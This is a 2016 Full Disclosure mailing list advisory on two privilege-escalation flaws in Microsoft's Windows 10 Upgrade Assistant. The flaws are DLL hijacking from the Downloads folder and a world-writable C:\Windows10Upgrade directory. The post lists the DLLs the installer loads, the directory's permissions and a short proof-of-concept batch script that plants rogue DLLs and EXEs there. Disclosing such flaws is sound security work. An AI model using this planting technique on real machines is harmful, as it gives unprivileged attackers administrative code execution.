Full Disclosure mailing list archives
Executable installers are vulnerable^WEVIL (case 38): Microsoft's Windows10Upgrade*.exe allows elevation of privilege
From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Thu, 11 Aug 2016 19:54:48 +0200
Hi @ll, the "Windows 10 Upgrade Assistant" Windows10Upgrade*.exe, available via <http://go.microsoft.com/fwlink/?LinkId=822783> on <https://www.microsoft.com/en-us/accessibility/windows10upgrade>, via <http://go.microsoft.com/fwlink/?LinkId=821403> on <https://support.microsoft.com/en-us/help/12387/windows-10-update-history>, and on <https://www.microsoft.com/en-us/software-download/windows10>, 1. is vulnerable DLL hijacking (see <https://cwe.mitre.org/data/definitions/426.html> and <https://cwe.mitre.org/data/definitions/427.html> for this WELL-KNOWN vulnerability); 2. creates an unsafe directory "C:\Windows10Upgrade\" (see <https://cwe.mitre.org/data/definitions/277.html> and <https://cwe.mitre.org/data/definitions/732.html> for this WELL-KNOWN vulnerability). Both vulnerabilities allow arbitrary code execution WITH elevation of privilege! Ad 1.: ~~~~~~ Applications which are offered as downloads to unsuspecting users will typically be saved into the users "Downloads" directory ... which is but a digital minefield: see <https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>, <http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html> and <http://seclists.org/fulldisclosure/2012/Aug/134> On a fully patched Windows 7 SP1, Windows10Upgrade*.exe loads and executes the following DLLs from its "application directory" (which typically happens to be the users "Downloads" directory): cabinet.dll, version.dll, propsys.dll, ntmarta.dll, linkinfo.dll, ntshrui.dll, srvcli.dll, cscapi.dll, slc.dll, secur32.dll, netutils.dll On other versions of Windows the list of DLLs may vary. Since its application manifest specifies "requireAdministrator", Windows10Upgrade*.exe runs with administrative privileges: all DLLs it loads and executes run with administrative privileges too, resulting in arbitrary code execution WITH elevation of privilege. If an attacker is able to place the DLLs named above per "drive-by download" in the users "Downloads" directory this becomes a remote code execution WITH elevation of privilege. Ad 2.: ~~~~~~ Upon execution Windows10Upgrade*.exe creates the directory "C:\Windows10Upgrade\", extracts its payload into it, creates a shortcut "Windows 10 Upgrade Assistant" in the start menu and finally starts "C:\Windows10Upgrade\Windows10UpgraderApp.exe" with administrative privleges. The (inherited) NTFS permissions of the directory "C:\Windows10Upgrade\" D:AI(A;OICIID;FA;;;BA)(A;OICIID;FA;;;SY)(A;OICIID;0x1200a9;;;BU)(A;OICIID;0x1301bf;;;AU) BUILTIN\Administrators: full access NT AUTHORITY\SYSTEM: full access BUILTIN\Users: read, execute NT AUTHORITY\Authenticated Users: read, write, execute, delete allow UNPRIVILEGED users to (over)write files in this directory, for example using the following batch script (the "rogue" binaries sentinel.exe and sentinel.dll are available from <http://home.arcor.de/skanthak/sentinel.html>): --- poc.cmd --- :WAIT @If Not Exist "%SystemDrive%\Windows10Upgrade" Goto :WAIT Copy sentinel.exe "%SystemDrive%\Windows10Upgrade\HTTPHelper.exe" Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\DXGIDebug.dll" Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\MSACM32.drv" For %%! In (mfc42u, odbc32, version, winhttp, webio, xmllite, cryptsp, rpcrtremote, api-ms-win-downlevel-shlwapi-l2-1-0, sxs, propsys, apphelp, secur32, uxtheme, msls31, oleacc, d2d1, dwrite, dxgi, dwmapi, dxgidebug, d3d11, d3d10warp, mlang, winmm, slc, iphlpapi, dnsapi, dhcpcsvc, midimap, wer) Do Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\%%!.dll" --- EOF --- "C:\Windows10Upgrade\Windows10UpgraderApp.exe" loads and executes these DLLs and EXEs with administrative rights, again resulting in elevation of privilege. stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2016-08-03 vulnerability report sent to vendor 2016-08-05 vendor replies: "We won't be creating an MSRC case for this." 2016-08-11 report published _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Executable installers are vulnerable^WEVIL (case 38): Microsoft's Windows10Upgrade*.exe allows elevation of privilege Stefan Kanthak (Aug 12)